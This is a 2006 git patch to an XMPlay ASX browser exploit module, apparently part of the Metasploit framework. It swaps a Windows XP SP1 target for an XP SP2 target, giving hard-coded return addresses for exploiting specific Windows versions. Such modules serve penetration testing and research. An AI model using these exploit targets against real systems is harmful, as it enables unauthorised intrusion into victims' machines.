From 55e0b973b18d36e9465d5c48c15f07cbd984c2a9 Mon Sep 17 00:00:00 2001 From: Mario Ceballos Date: Sun, 26 Nov 2006 20:00:08 +0000 Subject: [PATCH] removed XPSP1 target in xmplay_asx.rb and replaced it with an XPSP2 target. git-svn-id: file:///home/svn/framework3/trunk@4152 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/windows/browser/xmplay_asx.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index 5a652f5e30..c106c8162f 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -37,7 +37,7 @@ class Exploits::Windows::Browser::Xmplay_Asx < Msf::Exploit::Remote 'Targets' => [ [ 'Windows 2000 Pro English SP4', { 'Ret' => 0x77e14c29 } ], - [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ], + [ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 21 2006',